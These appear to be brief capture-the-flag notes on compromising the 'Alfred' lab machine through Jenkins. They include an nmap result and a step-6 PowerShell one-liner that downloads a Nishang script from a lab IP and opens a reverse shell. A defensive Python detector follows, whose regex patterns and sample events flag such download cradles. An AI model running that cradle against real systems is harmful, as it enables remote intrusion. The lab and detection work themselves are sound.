Alfred | Nmap, Jenkins, PowerShell

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

the thing

  1. port scan: nmap -sV <ip>
  2. open :8080
  3. login using credentials
  4. Jenkins version 2.190.1
  5. get Nishang reverse shell
  6. run: powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.185.230:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.185.230 -Port 443

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
  simple webserver for website
3389/tcp open  tcpwrapped
  idk kev
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
  jenkins webserver

Couldn't get past uploading the reverse shell; couldn't load the module after downloading.
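
From the defender's side, the command in step 6 is a PowerShell download cradle that shows up in process-creation logs. The sketch below is an added example, not part of the original notes: it flags command lines that both download and execute a script, and extracts the staging URL. The event fields (`host`, `parent`, `cmdline`), the sample records and the parent-process list are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A cradle needs both a download primitive and in-memory execution.
DOWNLOAD = re.compile(r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
# Assumption: server processes (Jenkins under Java, IIS w3wp) rarely start PowerShell.
SERVICE_PARENTS = ("java.exe", "w3wp.exe")


def describe_url(url):
    """Split a URL into the fields an analyst pivots on."""
    parts = urlsplit(url)
    try:
        ipaddress.ip_address(parts.hostname)
        raw_ip = True
    except ValueError:
        raw_ip = False  # hostname is a DNS name (or missing), not an IP literal
    return {"host": parts.hostname, "port": parts.port, "raw_ip": raw_ip,
            "script": parts.path.rsplit("/", 1)[-1]}


def find_cradles(events):
    """Return a finding for each event whose command line downloads and runs a script."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            findings.append({
                "host": ev["host"],
                "urls": [describe_url(u) for u in URL.findall(cmd)],
                "service_parent": ev["parent"].lower().endswith(SERVICE_PARENTS),
            })
    return findings


# Constructed process-creation records; the first reuses the download command from step 6.
SAMPLE_EVENTS = [
    {"host": "build01", "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": "powershell iex (New-Object Net.WebClient).DownloadString("
                "'http://10.10.185.230:8000/Invoke-PowerShellTcp.ps1')"},
    {"host": "build01", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip"},
    {"host": "build01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\build\deploy.ps1"},
]
```

Only the first record is reported: the second downloads without executing and the third runs a local file. A finding with `service_parent` set and a raw-IP URL on a non-standard port is the combination worth alerting on.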

Last modified 2023.11.02